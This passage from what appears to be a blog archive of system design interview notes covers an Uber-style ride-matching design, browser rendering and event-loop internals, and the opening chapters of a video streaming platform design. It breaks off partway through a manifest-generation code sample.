Bidirectional	Yes — server pushes dispatch offer to driver	No — driver must poll for offers separately
Server state	Stateful sticky routing needed	Stateless — any server handles any request
Battery impact	Low — persistent connection	High — repeated TLS handshakes

Chosen: WebSocket — at 5M drivers updating every 3 seconds, HTTP header overhead alone generates 3.3 GB/s of wasted bytes. WebSocket frames are ~20 bytes. The trade-off I accept is stateful sticky routing (drivers must reconnect to the same server region), which is acceptable because the Location Service is partitioned by city and drivers rarely cross region boundaries mid-shift.

[!NOTE]
Key Insight: WebSocket vs HTTP is a math problem. 5M drivers x 1 update/3s x 2KB HTTP overhead = 3.3 GB/s in headers alone. WebSocket frames are ~20 bytes. The transport choice is arithmetic, not preference.
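
The arithmetic is easy to reproduce. The sketch below uses only the figures quoted above (5M drivers, one update every 3 seconds, about 20 bytes per WebSocket frame, about 2KB of HTTP headers per request).

```javascript
// Figures from the comparison above.
const drivers = 5_000_000;
const updateIntervalSeconds = 3;
const updatesPerSecond = drivers / updateIntervalSeconds;

const bytesPerSecond = (bytesPerUpdate) => updatesPerSecond * bytesPerUpdate;
const toMegabytes = (bytes) => bytes / 1e6;

const webSocketMBps = toMegabytes(bytesPerSecond(20));
const httpMBps = toMegabytes(bytesPerSecond(2000));

console.log(Math.round(updatesPerSecond)); // 1666667
console.log(Math.round(webSocketMBps)); // 33
console.log(Math.round(httpMBps)); // 3333
```

The two transports differ by a factor of 100 in bytes on the wire, which is the ratio of the per-update overheads.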

Surge Pricing Consistency — Eventual vs Strong

Dimension	Strong consistency (read-your-writes)	Eventual consistency (Redis TTL 60s)
Accuracy	Multiplier always reflects latest demand	Up to 60s stale
Latency impact	Must read from DB or leader on every fare call	Redis sub-ms read
Complexity	Distributed transaction across Surge Calc + Ride Svc	Fire-and-forget write to Redis; Ride Svc reads independently
Rider impact	Price always reflects current demand	Rider may see slightly outdated price

Chosen: Eventual consistency with 60s TTL. The fare shown at request time is the fare charged (contractual). A 60-second staleness window does not materially harm riders or drivers. The strong-consistency alternative adds a synchronous DB read on every fare call — at 500K peak requests/sec this becomes a DB bottleneck.

[!NOTE]
Key Insight: Surge pricing staleness is a business tolerance decision, not a technical limitation. 60 seconds is enough granularity for a pricing signal. Exact real-time surge would require a synchronous distributed read on every fare request — the cost is not justified by the precision gained.

14. Interview Summary

[!TIP]
When the interviewer says "walk me through your Uber design," hit these points in order. Each is a decision with a clear WHY.

Key Decisions

Decision	Problem It Solves	Trade-off Accepted
WebSocket (not HTTP) for location	3.3 GB/s HTTP header waste at 5M drivers	Stateful sticky routing per city region
Redis Geo (not PostGIS) for live positions	1.67M location writes/sec; sub-ms spatial queries	Ephemeral — re-registers within 15s on crash
WATCH/MULTI/EXEC atomic state transition	Prevents double-booking without a separate lock service	30s TTL on RESERVED state — rare retry on server crash
Driver State Machine (IDLE/RESERVED/ON_TRIP)	Controls pool membership, update frequency, and crash recovery in one mechanism	State lives in Redis — not durable, but self-healing via TTL
Kafka for trip events (not direct DB write)	Decouples 300ms fast matching path from reliable billing write	5–20ms Kafka lag on durable writes — acceptable
ETA-based ranking (not distance)	Riders experience wait time, not map distance	Routing engine call for each top-K candidate — ~10ms per call
State-adaptive location frequency	60–70% Redis write reduction vs fixed 1s tick; no rider-visible degradation	Requires state machine to be the source of truth for update interval

Fast Path vs Reliable Path

Fast Path   (latency):   Driver WS -> Redis GEOADD -> GEORADIUS -> WATCH/EXEC -> WS push to driver
                         ON_TRIP tracking: Redis -> Kafka -> WS push to rider map

Reliable Path (safety):  trip_start / trip_end -> Kafka -> PostgreSQL (billing, history)
                         Fare request -> Ride Request DB -> Surge Calculator -> Redis

Location = fast path only (ephemeral, overwritten every 1-5s, TTL self-heals)
Trip record = reliable path (durable, drives billing and audit, never lost)

Key Insights Checklist

[!IMPORTANT]
These are the lines that make an interviewer lean forward. Know them cold.

"Matching is not about finding the nearest driver — it is about finding the fastest pickup." We rank by ETA, not distance. Distance is a proxy; ETA is the truth. Every system that ranks by distance is optimizing for the wrong metric.
"Consistency in driver assignment is enforced through state transitions, not locks." The atomic IDLE → RESERVED via WATCH/MULTI/EXEC is the mutual exclusion. No separate lock service. No ZooKeeper. The state is the truth.
"Location data is high-frequency and ephemeral — storing it in a DB creates write bottlenecks." Redis holds only the current position. TTL self-evicts stale data. The previous coordinate has zero value the moment the next one arrives.
"Update frequency is a function of driver state, not a single tuning knob." IDLE drivers waste 60–70% of Redis write capacity if pinged every second. The state machine already knows the state — frequency is derived from it for free.
"The Kafka queue is a correctness requirement." Decoupling fast matching (Redis, sub-100ms) from reliable billing (Kafka → DB) is what makes both guarantees achievable simultaneously. Without Kafka, a slow DB write would block the matching path.
"CAP per component." Rider-facing services are AP. Driver assignment is CP. The system is not uniformly one or the other — this is the right answer in an interview.

Browser Internals: A Senior Engineer's Deep Dive

Arghya Majumder — Sun, 11 Jan 2026 18:52:07 +0000

Browser Internals: A Senior Engineer's Deep Dive

Understanding how the browser works under the hood is essential for performance optimization and debugging.

1. The Browser Architecture

Modern browsers have a multi-process architecture:

┌─────────────────────────────────────────────────────────────┐
│                     Browser Process                          │
│  (UI, bookmarks, network, storage)                          │
└─────────────────────────────────────────────────────────────┘
         │              │              │              │
         ▼              ▼              ▼              ▼
┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│  Renderer   │ │  Renderer   │ │  Renderer   │ │    GPU      │
│  Process    │ │  Process    │ │  Process    │ │  Process    │
│  (Tab 1)    │ │  (Tab 2)    │ │  (Tab 3)    │ │             │
└─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘

Why Multiple Processes?

Benefit	Explanation
Security	Each tab is sandboxed; malicious site can't access other tabs
Stability	If one tab crashes, others survive
Performance	Parallel processing across CPU cores

2. The Rendering Pipeline (Critical Rendering Path)

This is the most important concept for frontend performance.

┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐
│   HTML   │───▶│   DOM    │───▶│  Render  │───▶│  Layout  │───▶│  Paint   │
│  Parse   │    │   Tree   │    │   Tree   │    │          │    │          │
└──────────┘    └──────────┘    └──────────┘    └──────────┘    └──────────┘
                     │                │
                     │                │
               ┌─────▼─────┐          │
               │   CSSOM   │──────────┘
               │   Tree    │
               └───────────┘

Step-by-Step Breakdown

1. HTML Parsing → DOM Tree

<html>
  <body>
    <div id="app">
      <p>Hello</p>
    </div>
  </body>
</html>

        document
            │
          html
            │
          body
            │
        div#app
            │
           p
            │
        "Hello"

Key Point: The parser is synchronous. When it hits a <script> without async or defer, it STOPS until that script has been fetched and executed.

2. CSS Parsing → CSSOM Tree

body { font-size: 16px; }
#app { color: blue; }
p { margin: 10px; }

        CSSOM
          │
     ┌────┴────┐
   body      #app
(font:16)   (color:blue)
     │
     p
 (margin:10)

Key Point: CSSOM construction blocks rendering. This is why we inline critical CSS.

3. Render Tree (DOM + CSSOM)

Only visible elements are included:

Render Tree:
  body (font: 16px)
    └─ div#app (color: blue)
         └─ p (margin: 10px)
              └─ "Hello"

NOT included:
  - <head> and its children
  - Elements with display: none
  - <script>, <meta>, <link>
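
The filtering rule can be sketched on a toy DOM. `buildRenderTree` and the node shape are hypothetical; real engines also resolve the cascade and inheritance, which this example ignores.

```javascript
// Toy DOM nodes: { tag, style?, children?, text? }. Nodes that a browser would
// not render are dropped along with their whole subtree.
const NON_VISUAL_TAGS = new Set(["head", "script", "meta", "link"]);

function buildRenderTree(node) {
  if (NON_VISUAL_TAGS.has(node.tag)) return null;
  if (node.style?.display === "none") return null;
  const children = (node.children ?? [])
    .map((child) => buildRenderTree(child))
    .filter((child) => child !== null);
  return { tag: node.tag, text: node.text, children };
}

const dom = {
  tag: "html",
  children: [
    { tag: "head", children: [{ tag: "meta" }] },
    {
      tag: "body",
      children: [
        { tag: "div", children: [{ tag: "p", text: "Hello" }] },
        { tag: "div", style: { display: "none" }, children: [{ tag: "p", text: "Hidden" }] },
        { tag: "script" },
      ],
    },
  ],
};

const renderTree = buildRenderTree(dom);
console.log(renderTree.children.map((n) => n.tag)); // [ 'body' ]
console.log(renderTree.children[0].children.length); // 1
```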

4. Layout (Reflow)

Calculates the exact position and size of each element:

┌────────────────────────────────────────┐
│ body: 0,0 - 1920x1080                  │
│  ┌──────────────────────────────────┐  │
│  │ div#app: 8,8 - 1904x500          │  │
│  │  ┌────────────────────────────┐  │  │
│  │  │ p: 8,18 - 1904x20          │  │  │
│  │  └────────────────────────────┘  │  │
│  └──────────────────────────────────┘  │
└────────────────────────────────────────┘

Expensive Operation: Changing width, height, or position triggers reflow of the element and all its descendants, and often of siblings and ancestors whose geometry depends on it.

5. Paint

Fills in pixels: colors, borders, shadows, text.

Paint Order:

Background color
Background image
Border
Children
Outline

6. Composite

GPU combines layers into final image. Elements on separate layers can animate without repaint.

3. The Event Loop: JavaScript's Heartbeat

JavaScript is single-threaded. The Event Loop is how it handles async operations.

The Mental Model

┌─────────────────────────────────────────────────────────────┐
│                         HEAP                                 │
│                   (Object Storage)                           │
└─────────────────────────────────────────────────────────────┘

┌─────────────┐     ┌─────────────────────────────────────────┐
│   CALL      │     │              WEB APIs                    │
│   STACK     │     │  (setTimeout, fetch, DOM events, etc.)  │
│             │     └──────────────────┬──────────────────────┘
│  function() │                        │
│  function() │                        ▼
│  main()     │     ┌─────────────────────────────────────────┐
└─────────────┘     │           CALLBACK QUEUES                │
       ▲            │  ┌─────────────────────────────────────┐ │
       │            │  │ Microtask Queue (Promises, queueMT) │ │
       │            │  └─────────────────────────────────────┘ │
       │            │  ┌─────────────────────────────────────┐ │
       └────────────│  │ Macrotask Queue (setTimeout, I/O)   │ │
     Event Loop     │  └─────────────────────────────────────┘ │
     picks next     └─────────────────────────────────────────┘

Execution Order

console.log('1');  // Sync

setTimeout(() => console.log('2'), 0);  // Macrotask

Promise.resolve().then(() => console.log('3'));  // Microtask

console.log('4');  // Sync

// Output: 1, 4, 3, 2

The Rule:

Execute all synchronous code (Call Stack empties)
Execute ALL microtasks (Promise callbacks, queueMicrotask)
Execute ONE macrotask (setTimeout, setInterval, I/O)
Repeat from step 2
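
The four steps above can be sketched as a toy scheduler. This is only a model for reasoning about ordering, not how a browser or Node implements the loop; `runToyEventLoop` and its `api` object are hypothetical names, and the timer delay is ignored.

```javascript
// Toy model of the four-step rule; real engines are far more involved.
function runToyEventLoop(mainScript) {
  const log = [];
  const microtasks = [];
  const macrotasks = [];
  const api = {
    log: (message) => log.push(message),
    queueMicrotask: (fn) => microtasks.push(fn),
    setTimeout: (fn) => macrotasks.push(fn), // delay is ignored in this model
  };
  const drainMicrotasks = () => {
    // Microtasks queued while draining also run before the loop moves on.
    while (microtasks.length > 0) microtasks.shift()();
  };

  mainScript(api);   // Step 1: run synchronous code to completion
  drainMicrotasks(); // Step 2: run ALL microtasks
  while (macrotasks.length > 0) {
    macrotasks.shift()(); // Step 3: run ONE macrotask
    drainMicrotasks();    // Step 4: repeat from step 2
  }
  return log;
}

const toyOrder = runToyEventLoop((api) => {
  api.log('1');
  api.setTimeout(() => {
    api.log('2');
    api.queueMicrotask(() => api.log('2a')); // queued inside a macrotask
  });
  api.setTimeout(() => api.log('5'));
  api.queueMicrotask(() => api.log('3'));
  api.log('4');
});
console.log(toyOrder.join(', ')); // 1, 4, 3, 2, 2a, 5
```

Note that `2a` runs before `5`: a microtask queued inside one macrotask is drained before the next macrotask starts.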

Microtasks vs Macrotasks

Microtasks	Macrotasks
`Promise.then/catch/finally`	`setTimeout`
`queueMicrotask()`	`setInterval`
`MutationObserver`	`setImmediate` (Node)
`process.nextTick` (Node)	I/O callbacks
	`requestAnimationFrame`*

*requestAnimationFrame callbacks are not ordinary macrotasks: they run once per frame, just before the browser recalculates style and layout and repaints.

The Danger: Blocking the Event Loop

// BAD: Blocks for 5 seconds
function processLargeArray(items) {
  items.forEach(item => {
    // Heavy computation
    heavyWork(item);
  });
}

// GOOD: Yield to the event loop
async function processLargeArray(items) {
  // entries() gives us the index that the yield check below needs
  for (const [index, item] of items.entries()) {
    heavyWork(item);

    // Let the browser breathe after every 100 items
    if ((index + 1) % 100 === 0) {
      await new Promise(r => setTimeout(r, 0));
    }
  }
}

4. Reflow vs Repaint

Understanding what triggers each is crucial for performance.

Repaint (Cheap)

Changes to visual properties that don't affect layout:

element.style.color = 'red';
element.style.backgroundColor = 'blue';
element.style.visibility = 'hidden';  // Still takes space
element.style.opacity = 0.5;

Reflow (Expensive)

Changes to geometry trigger layout recalculation:

element.style.width = '100px';
element.style.height = '200px';
element.style.padding = '10px';
element.style.margin = '20px';
element.style.display = 'none';  // Removed from layout
element.style.position = 'absolute';
element.style.fontSize = '20px';  // Text reflow!

Layout Thrashing

The worst performance anti-pattern:

// BAD: Forces a reflow on almost every iteration (100 elements → ~100 reflows)
elements.forEach(el => {
  const height = el.offsetHeight;  // READ → forces layout
  el.style.height = height + 10 + 'px';  // WRITE → invalidates layout
});

// GOOD: Batch reads, then batch writes
const heights = elements.map(el => el.offsetHeight);  // All reads

elements.forEach((el, i) => {
  el.style.height = heights[i] + 10 + 'px';  // All writes
});
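
To see why the batched version wins, here is a toy stand-in for the DOM that counts forced reflows. `FakePage` and `countForcedReflows` are hypothetical helpers written for this sketch; a real browser tracks invalidation in far more detail, but the read-after-write pattern is the same.

```javascript
// Toy stand-in for the DOM: reading offsetHeight "reflows" only if a write
// has invalidated layout since the last read.
class FakePage {
  constructor() {
    this.dirty = false;
    this.forcedReflows = 0;
  }
  createElement(height) {
    const page = this;
    let currentHeight = height;
    return {
      get offsetHeight() {
        if (page.dirty) {
          page.forcedReflows += 1; // layout must be recomputed right now
          page.dirty = false;
        }
        return currentHeight;
      },
      setHeight(px) {
        currentHeight = px;
        page.dirty = true; // a write only invalidates layout
      },
    };
  }
}

function countForcedReflows(resize) {
  const page = new FakePage();
  const elements = Array.from({ length: 100 }, () => page.createElement(20));
  resize(elements);
  return page.forcedReflows;
}

const interleaved = countForcedReflows((els) => {
  els.forEach((el) => el.setHeight(el.offsetHeight + 10)); // read, write, read, write...
});
const batched = countForcedReflows((els) => {
  const heights = els.map((el) => el.offsetHeight);      // all reads
  els.forEach((el, i) => el.setHeight(heights[i] + 10)); // all writes
});
console.log({ interleaved, batched }); // { interleaved: 99, batched: 0 }
```

The very first read finds a clean layout, which is why the interleaved count is 99 rather than 100 in this model.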

Properties That Trigger Layout

Reading these forces a synchronous reflow if layout has been invalidated since the last one:

// These are "layout-triggering" getters
element.offsetTop / offsetLeft / offsetWidth / offsetHeight
element.scrollTop / scrollLeft / scrollWidth / scrollHeight
element.clientTop / clientLeft / clientWidth / clientHeight
element.getBoundingClientRect()
window.getComputedStyle(element)  // when a layout-dependent value (e.g. width) is read

5. Compositor Layers

The GPU can animate certain properties without reflow or repaint.

Properties Handled by Compositor

/* These can animate on the compositor without layout or paint (usually smooth, but 60fps is not guaranteed) */
transform: translateX(100px);
transform: scale(1.5);
transform: rotate(45deg);
opacity: 0.5;

How to Promote to Own Layer

/* Modern way */
.animated-element {
  will-change: transform;
}

/* Legacy fallback */
.animated-element {
  transform: translateZ(0);  /* "Null transform hack" */
}

The Layer Explosion Problem

/* BAD: Creates too many layers */
* {
  will-change: transform;
}

/* GOOD: Only elements that will animate */
.card:hover {
  will-change: transform;
}
.card {
  will-change: auto;  /* Release after animation */
}

6. requestAnimationFrame: The Right Way to Animate

Why Not setTimeout / setInterval?

let x = 0;  // Current left offset in px

// BAD: Timer doesn't sync with display refresh
setInterval(() => {
  element.style.left = x++ + 'px';
}, 16);  // Hoping for 60fps

// GOOD: Synced with browser's paint cycle
function animate() {
  element.style.left = x++ + 'px';
  requestAnimationFrame(animate);
}
requestAnimationFrame(animate);

When rAF Fires

┌────────────────────────────────────────────────────────────┐
│                    One Frame (~16.67ms)                     │
├──────────┬──────────┬──────────┬──────────┬───────────────┤
│   JS     │   rAF    │  Style   │  Layout  │     Paint     │
│ (events) │callbacks │  Calc    │          │   Composite   │
└──────────┴──────────┴──────────┴──────────┴───────────────┘

7. Web Workers: True Parallelism

For heavy computation that would block the main thread:

// main.js
const worker = new Worker('worker.js');

worker.postMessage({ data: largeArray });

worker.onmessage = (event) => {
  console.log('Result:', event.data);
};

// worker.js
self.onmessage = (event) => {
  // main.js posts { data: largeArray }, so unwrap the payload first
  const result = heavyComputation(event.data.data);
  self.postMessage(result);
};

Limitations

Can Access	Cannot Access
`fetch`	DOM
`setTimeout/setInterval`	`window`
`WebSockets`	`document`
`IndexedDB`	UI-related APIs
`postMessage`	`localStorage` (use IndexedDB)

8. Memory Management & Garbage Collection

How GC Works (Mark and Sweep)

1. Mark Phase: Start from "roots" (global, stack), mark all reachable objects
2. Sweep Phase: Delete all unmarked objects
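
A minimal sketch of the two phases on a toy heap, assuming objects are modelled as ids with lists of outgoing references. `markAndSweep` is a hypothetical helper; production collectors are generational and incremental, which this ignores.

```javascript
// heap: Map of object id -> array of ids it references
function markAndSweep(heap, roots) {
  // Mark phase: walk everything reachable from the roots.
  const marked = new Set();
  const stack = [...roots];
  while (stack.length > 0) {
    const id = stack.pop();
    if (marked.has(id) || !heap.has(id)) continue;
    marked.add(id);
    stack.push(...heap.get(id));
  }

  // Sweep phase: delete everything that was not marked.
  const swept = [];
  for (const id of [...heap.keys()]) {
    if (!marked.has(id)) {
      heap.delete(id);
      swept.push(id);
    }
  }
  return swept;
}

const toyHeap = new Map([
  ['window', ['app']],
  ['app', ['cache']],
  ['cache', []],
  ['orphanA', ['orphanB']], // orphanA and orphanB reference each other
  ['orphanB', ['orphanA']], // but nothing reachable points at them
]);
const sweptIds = markAndSweep(toyHeap, ['window']);
console.log(sweptIds); // [ 'orphanA', 'orphanB' ]
```

Because reachability is what matters, the two orphans are collected even though they reference each other.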

Common Memory Leaks

// 1. Forgotten event listeners
element.addEventListener('click', handler);
// element removed from DOM, but handler still references it

// 2. Closures holding references
function createHandler() {
  const largeData = new Array(1000000);
  return () => console.log(largeData.length);
}

// 3. Detached DOM trees
const div = document.createElement('div');
div.innerHTML = '<span>Hello</span>';
// div never added to DOM, but JavaScript holds reference

Detecting Leaks

// Chrome DevTools → Memory → Take Heap Snapshot
// Compare snapshots before and after suspected leak

9. Interview Tip

"I understand the browser as a multi-stage pipeline: parsing HTML/CSS into trees, combining them into the render tree, calculating layout, painting pixels, and compositing layers. I optimize by avoiding layout thrashing (batch reads before writes), using compositor-friendly properties (transform, opacity) for animations, and leveraging requestAnimationFrame for smooth 60fps. For heavy computation, I use Web Workers to keep the main thread responsive. Understanding the event loop — especially the microtask/macrotask distinction — helps me write predictable async code."

Video Streaming Platform (YouTube / Hotstar / Netflix / Prime) High-level System Design

Arghya Majumder — Sun, 11 Jan 2026 18:07:28 +0000

Video Streaming Platform (YouTube / Netflix / Hotstar)

Chapter 1 — Product Requirements, Scale, and Design Targets

This chapter defines what kind of video platform we are building and the physical limits it must survive.

Everything that follows in this book is constrained by these numbers.

We are designing a global video streaming platform in the class of YouTube, Netflix, and Amazon Prime Video that supports:

User-generated uploads
Studio-grade content
On-demand playback
Live streaming
Offline viewing
Multi-device continuity

The system must feel instant, reliable, and smooth for hundreds of millions of users.

1. Functional Requirements

The platform must support the following core user actions:

Content creators

Upload raw video files of arbitrary length and size
See upload progress and failure recovery
Have videos transcoded into multiple qualities
Publish videos to be watchable by viewers

Viewers

Discover and open a video
Start playback in under 2 seconds
Seek, pause, and change quality without visible glitches
Continue watching the same video on another device
Download videos for offline playback
Watch live streams with minimal delay

Platform

Track watch time, views, and engagement
Recommend content
Enforce regional, subscription, and DRM rules
Protect against piracy and abuse

2. Non-Functional Requirements

These are the invisible constraints that shape the architecture.

Latency

Time-to-first-frame: < 2 seconds for most users
Seek latency: < 500 ms
Live stream delay: < 5 seconds from broadcaster to viewer

Reliability

A CDN edge failure must not stop playback
Analytics outages must not stop playback
Backend outages should only block new playback starts, not active streams

Consistency

Resume position can be eventually consistent
View counts can be delayed
DRM enforcement must be strongly consistent

Scalability

Must support global viral traffic spikes
One video can be watched by tens of millions simultaneously

3. Traffic Model

We design for a YouTube-scale service.

Users

300 million daily active users
50 million concurrent viewers at peak

Playback

Average session: 30 minutes
Average bitrate: 3 Mbps
Peak bitrate: 15–25 Mbps (4K)

This means peak outbound traffic can exceed:

50M users × 3 Mbps = 150 Tbps

This immediately tells us:
No backend service can ever sit in the video data path.
Only CDNs can handle this scale.
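
The arithmetic can be checked in a few lines. The 10 Gbps per-server figure is an assumption added here purely to show the order of magnitude; it is not part of the traffic model.

```javascript
// Peak egress in Tbps for a given number of concurrent viewers.
function peakEgressTbps(concurrentViewers, avgBitrateMbps) {
  const MBPS_PER_TBPS = 1e6;
  return (concurrentViewers * avgBitrateMbps) / MBPS_PER_TBPS;
}

const peakTbps = peakEgressTbps(50e6, 3);
console.log(peakTbps); // 150

// Assumption: one origin server can push 10 Gbps of video at best.
const ASSUMED_SERVER_GBPS = 10;
const serversNeeded = Math.ceil((peakTbps * 1000) / ASSUMED_SERVER_GBPS);
console.log(serversNeeded); // 15000 fully saturated servers, with zero headroom
```

Even under that generous assumption, serving video from backend machines would need a fleet that does nothing but push bytes, which is exactly the job a CDN already does.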

4. Upload Model

Creators upload far fewer videos than viewers watch.

10 million uploads per day
Average file size: 1–3 GB
Average upload throughput: roughly 1–3 Tbps globally (10M uploads × 1–3 GB × 8 bits ÷ 86,400 s), with peaks above that

Uploads are heavy but not latency-sensitive.
They can be queued, retried, and processed asynchronously.

5. Storage Model

We store multiple versions of every video.

If a 1-hour video is transcoded into:

4K
1080p
720p
480p
360p

And segmented into 4-second chunks, a single video produces thousands of objects.
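
As a rough count, assuming an HLS-style layout with one media playlist per rendition plus one master playlist (that layout is an assumption of this sketch):

```javascript
// Number of stored objects for one video.
function objectsPerVideo(durationSeconds, segmentSeconds, renditionCount) {
  const segmentsPerRendition = Math.ceil(durationSeconds / segmentSeconds);
  const mediaPlaylists = renditionCount; // assumed: one playlist per rendition
  const masterPlaylist = 1;
  return segmentsPerRendition * renditionCount + mediaPlaylists + masterPlaylist;
}

const objectsForOneHour = objectsPerVideo(3600, 4, 5);
console.log(objectsForOneHour); // 4506 = 900 segments x 5 renditions + 5 + 1
```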

At YouTube scale:

Exabytes of cold storage
Petabytes of hot CDN cache

This forces us to use:

Cheap object storage (S3-like)
Aggressive CDN caching
Versioned immutable files

6. Design Targets

These numbers lock in the architecture.

Constraint	Consequence
150+ Tbps video traffic	Video must flow only through CDNs
Millions of concurrent users	Backend must be stateless & horizontally scalable
Billions of video segments	Storage must be object-based, not filesystem-based
UI must never freeze	Player logic (manifest parsing, ABR) should run off the main thread where possible
Analytics can lag	Events must be async via Kafka-style logs

These constraints will force:

A two-plane architecture (control vs data)
A frontend-driven control loop
A CDN-first delivery model

End of Chapter 1.

Chapter 2 — Global Platform Architecture

This chapter defines the full system at 30,000 feet before we dive into any single pipeline.
Every service, database, CDN, and client lives inside this picture.

The most important idea is this:

Video bytes and playback control must never flow through the same systems.

This is the single architectural rule that allows the platform to scale to hundreds of millions of users.

1. The Two-Plane Architecture

The platform is split into two planes:

Control Plane

Handles:
- Authentication
- Authorization
- Metadata
- Manifests
- DRM
- Analytics events

Data Plane

Handles:
- Video bytes
- Audio bytes
- Subtitle bytes
- Segment delivery

The control plane is backend-heavy.

The data plane is CDN-heavy.

2. High-Level System Diagram

┌─────────────────────────────────────────────────────────────────────────┐
│                            CLIENT LAYER                                  │
│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐                  │
│  │   Web App    │  │  Mobile App  │  │   Smart TV   │                  │
│  │  (React/Vue) │  │ (iOS/Android)│  │     App      │                  │
│  └──────┬───────┘  └──────┬───────┘  └──────┬───────┘                  │
└─────────┼──────────────────┼──────────────────┼──────────────────────────┘
          │                  │                  │
          └──────────────────┼──────────────────┘
                             │
                    ┌────────▼────────┐
                    │   API Gateway   │
                    │  (Rate Limiting,│
                    │   Auth, Routing)│
                    └────────┬────────┘
                             │
          ┌──────────────────┼──────────────────┐
          │                  │                  │
   ┌──────▼──────┐    ┌─────▼──────┐    ┌─────▼──────┐
   │   Video     │    │  Metadata  │    │   User     │
   │  Upload     │    │  Service   │    │  Service   │
   │  Service    │    │            │    │            │
   └──────┬──────┘    └─────┬──────┘    └─────┬──────┘
          │                 │                  │
          │                 │                  │
   ┌──────▼──────┐    ┌─────▼──────┐    ┌─────▼──────┐
   │  Transcode  │    │  Comment   │    │ Recommend. │
   │   Service   │    │  Service   │    │  Service   │
   │  (Queue)    │    │            │    │   (ML)     │
   └──────┬──────┘    └─────┬──────┘    └─────┬──────┘
          │                 │                  │
          │                 │                  │
┌─────────▼─────────────────▼──────────────────▼─────────────┐
│                     DATA LAYER                              │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐  │
│  │   SQL    │  │  NoSQL   │  │  Object  │  │  Cache   │  │
│  │   (RDS)  │  │(Cassandra│  │ Storage  │  │ (Redis)  │  │
│  │          │  │/DynamoDB)│  │   (S3)   │  │          │  │
│  └──────────┘  └──────────┘  └──────────┘  └──────────┘  │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│                    CDN LAYER                                 │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐  │
│  │  CDN Edge│  │  CDN Edge│  │  CDN Edge│  │  CDN Edge│  │
│  │   (US)   │  │   (EU)   │  │  (APAC)  │  │  (Others)│  │
│  └──────────┘  └──────────┘  └──────────┘  └──────────┘  │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│                  BACKGROUND JOBS                             │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐  │
│  │Thumbnail │  │  View    │  │Analytics │  │  CDN     │  │
│  │Generator │  │ Counter  │  │Processor │  │ Warmer   │  │
│  └──────────┘  └──────────┘  └──────────┘  └──────────┘  │
└─────────────────────────────────────────────────────────────┘

The backend never streams video.

It only gives the client permission and coordinates where to get it.

3. Why This Architecture Exists

If even 1% of video traffic hit the backend:

150 Tbps × 1% = 1.5 Tbps

No database, API layer, or VPC can survive that.

So:

Backend gives URLs
CDN gives bytes

This separation makes:

Video cheap
Latency low
Scaling trivial

4. Where the Frontend Fits

The frontend is not “just a UI”.
It is the playback brain.

It decides:

Which quality to use
When to prefetch
When to pause
When to seek
When to retry

The backend only provides:

The map (manifest)
The rules (DRM, region, quality caps)

This makes the platform:

Highly available
Resistant to partial failures
Cheap to operate

5. Failure Boundaries

This architecture enforces strong blast-radius isolation.

If this fails:

Component	What breaks
CDN edge	Player switches to another edge
Metadata DB	New playback may fail
Analytics	No metrics, playback continues
Kafka	Data piles up, playback continues

Playback is protected by design.

End of Chapter 2.

Chapter 3 — The Ingestion & Transcoding Pipeline (Merged Logic)

To handle millions of hours of uploads globally, the system must treat ingestion as an asynchronous, fault-tolerant factory.

3.1 Resumable Upload Flow

We avoid simple POST requests for large files. Instead, the Frontend utilizes the TUS Protocol or S3 Multipart Upload to ensure reliability.

Handshake: The Client requests a unique videoId and a pre-signed uploadUrl from the Upload Service.
Chunking: The Frontend Client breaks the video file into small, equal-sized chunks (e.g., 5MB each).
Transmission: Chunks are sent sequentially or in parallel with a checksum. If the connection drops, the client queries the server for the last successful byte offset and resumes.
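
The chunking and resume steps can be sketched as two pure functions. This is a simplified model, not the tus or S3 Multipart API: `planChunks` and `remainingChunks` are hypothetical names, and the server is assumed to report a single confirmed byte offset.

```javascript
const CHUNK_SIZE = 5 * 1024 * 1024; // 5 MiB, matching the example above

// Split a file of fileSize bytes into [start, end) byte ranges.
function planChunks(fileSize, chunkSize = CHUNK_SIZE) {
  const chunks = [];
  for (let start = 0; start < fileSize; start += chunkSize) {
    chunks.push({
      index: chunks.length,
      start,
      end: Math.min(start + chunkSize, fileSize),
    });
  }
  return chunks;
}

// The server has confirmed bytes [0, confirmedOffset). Any chunk that is not
// fully inside that range is sent again.
function remainingChunks(chunks, confirmedOffset) {
  return chunks.filter((chunk) => chunk.end > confirmedOffset);
}

const uploadPlan = planChunks(12 * 1024 * 1024);
console.log(uploadPlan.length); // 3 (5 MiB, 5 MiB, 2 MiB)

// Connection dropped after the first chunk was acknowledged.
const toResend = remainingChunks(uploadPlan, 5 * 1024 * 1024);
console.log(toResend.map((c) => c.index)); // [ 1, 2 ]
```

A chunk that was only partially received is resent in full here, which keeps the client simple at the cost of a few repeated megabytes.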

3.2 Transcoding & Processing (The "Refinery")

Once the raw file is stored in Object Storage (S3), an event triggers the Transcoding Service.

The Transcoding Workflow:

Job Orchestration: A Message Queue (Kafka/SQS) holds transcoding tasks to decouple the upload from processing.
Parallel Workers: Distributed workers (using FFmpeg) pick up jobs to generate the Quality Ladder:
- Resolutions: 4K (2160p), 1080p, 720p, 480p, 360p, 240p.
- Codecs: H.264 (Compatibility), H.265/VP9 (Efficiency).
Segmenting: The workers break each version into short segments (.ts or .m4s files; 4 seconds in the storage model above, with 2-10 seconds being common) and generate the HLS/DASH Manifests (.m3u8 or .mpd).
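
To make the manifest step concrete, here is a sketch that renders an HLS master playlist from a quality ladder. The bitrates and the `<name>/playlist.m3u8` path layout are illustrative assumptions, not values from this design; only the `#EXTM3U` and `#EXT-X-STREAM-INF` tags come from the HLS format itself.

```javascript
// Illustrative ladder; bandwidth values (bits per second) are assumptions.
const QUALITY_LADDER = [
  { name: '1080p', width: 1920, height: 1080, bandwidth: 5000000 },
  { name: '720p', width: 1280, height: 720, bandwidth: 2800000 },
  { name: '360p', width: 640, height: 360, bandwidth: 800000 },
];

// Each variant is one #EXT-X-STREAM-INF line followed by its playlist URI.
function buildMasterPlaylist(ladder) {
  const lines = ['#EXTM3U'];
  for (const rendition of ladder) {
    lines.push(
      `#EXT-X-STREAM-INF:BANDWIDTH=${rendition.bandwidth},` +
        `RESOLUTION=${rendition.width}x${rendition.height}`
    );
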